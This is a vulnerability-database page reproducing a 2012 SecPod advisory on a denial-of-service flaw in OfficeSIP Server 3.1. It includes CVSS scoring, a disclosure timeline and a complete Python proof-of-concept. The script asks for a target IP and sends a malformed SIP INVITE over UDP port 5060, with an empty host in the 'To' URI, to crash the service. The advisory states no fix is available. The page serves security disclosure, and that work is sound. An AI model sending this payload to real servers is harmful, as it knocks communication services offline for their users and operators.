OfficeSIP Server 3.1 Denial Of Service Vulnerability

2012-02-03 / 2012-08-15
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-20


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

############################################################################## # # Title : OfficeSIP Server Denial Of Service Vulnerability # Author : Prabhu S Angadi SecPod Technologies (www.secpod.com) # Vendor : http://www.officesip.com # Advisory : http://secpod.org/blog/?p=461 # http://secpod.org/advisories/SecPod_Exploit_OfficeSIP_Server_DOS_Vuln.txt # http://secpod.org/exploits/SecPod_Exploit_OfficeSIP_Server_DOS.py # Software : OfficeSIP Server 3.1 # Date : 01/02/2012 # ############################################################################### SecPod ID: 1034 22/12/2011 Issue Discovered 20/01/2012 Reported to Vendor No Response 01/02/2012 Advisory Released Class: Denial Of Service Severity: Medium Overview: --------- Office SIP Server version 3.1 is prone to a denial of service vulnerability. Technical Description: ---------------------- The vulnerability is caused due to improper validation of SIP/SIPS URI in the 'To' header of the request, which allows remote attackers to cause denial of service condition. Impact: -------- Successful exploitation could allow an attacker to crash the service. Affected Software: ------------------ OfficeSIP Server 3.1 Tested on: ----------- OfficeSIP Server 3.1 on Windows XP SP2 & SP3. Older versions might be affected. References: ----------- http://www.officesip.com http://secpod.org/blog/?p=461 http://www.officesip.com/download/OfficeSIP-Server-3.1.zip Proof of Concept: ---------------- http://secpod.org/exploits/SecPod_Exploit_OfficeSIP_Server_DOS.py Solution: ---------- Not available Risk Factor: ------------- CVSS Score Report: ACCESS_VECTOR = NETWORK ACCESS_COMPLEXITY = LOW AUTHENTICATION = NOT_REQUIRED CONFIDENTIALITY_IMPACT = NONE INTEGRITY_IMPACT = NONE AVAILABILITY_IMPACT = PARTIAL EXPLOITABILITY = PROOF_OF_CONCEPT REMEDIATION_LEVEL = UNAVAILABLE REPORT_CONFIDENCE = CONFIRMED CVSS Base Score = 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P) Risk factor = Medium Credits: -------- Prabhu S Angadi of SecPod Technologies has been credited with the discovery of this vulnerability. #!/usr/bin/python ############################################################################## # # Title : OfficeSIP Server Denial Of Service Vulnerability # Author : Prabhu S Angadi SecPod Technologies (www.secpod.com) # Vendor : http://www.officesip.com # Advisory : http://secpod.org/blog/?p=461 # http://secpod.org/advisories/SecPod_Exploit_OfficeSIP_Server_DOS_Vuln.txt # http://secpod.org/exploits/SecPod_Exploit_OfficeSIP_Server_DOS.py # Software : OfficeSIP Server 3.1 # Date : 01/02/2012 # ############################################################################## import socket,sys,time port = 5060 target = raw_input("Enter host/target ip address: ") if not target: print "Host/Target IP Address is not specified" sys.exit(1) print "you entered ", target try: socket.inet_aton(target) except socket.error: print "Invalid IP address found ..." sys.exit(1) try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: print "socket() failed service not running" sys.exit(1) #Malicous To SIP URI triggers vulnerability and brings SIP port down exploit = "INVITE sip:test@officesip.local SIP/2.0\r\n"+\ "Via: SIP/2.0/UDP example.com\r\n"+\ "To: user2 <sip:malicioususer@>\r\n"+\ "From: user1 <sip:user1@server1.com>;tag=00\r\n"+\ "Call-ID: test@server.com\r\n"+\ "CSeq: 1 INVITE\r\n"+\ "Contact: <sip:user1@server1.com>\r\n\r\n" sock.sendto(exploit, (target, port)) #Server evaluates and takes a while to go down. time.sleep(40) sock.close() #Verify port is down try: sock.connect() except: print "OfficeSIP server port is down." print "Service not responding ...." sys.exit(1)

References:

http://www.officesip.com
http://secpod.org/blog/?p=461


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top